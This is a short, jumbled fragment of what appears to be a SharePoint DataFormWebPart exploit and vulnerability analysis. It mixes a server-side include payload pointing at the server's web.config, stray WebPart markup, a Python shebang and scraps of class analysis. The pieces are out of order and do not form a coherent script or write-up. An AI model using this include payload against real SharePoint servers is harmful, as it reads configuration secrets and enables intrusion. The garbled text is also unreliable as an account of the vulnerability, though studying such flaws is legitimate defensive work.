-#include file=\"c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config\"--> </xsl> </WebPartPages:DataFormWebPart /usr/bin/python3 """ Microsoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include folder as this exploit ## Vulnerability Analysis: Inside of the Microsoft.SharePoint.WebPartPages.DataFormWebPart ] [SharePointPermission(SecurityAction.InheritanceDemand, ObjectModel = true)] public class DataFormWebPart Then at *[2]* the code calls `DataFormWebPart.RunatChecker.IsMatch` on our controlled `_partContent`.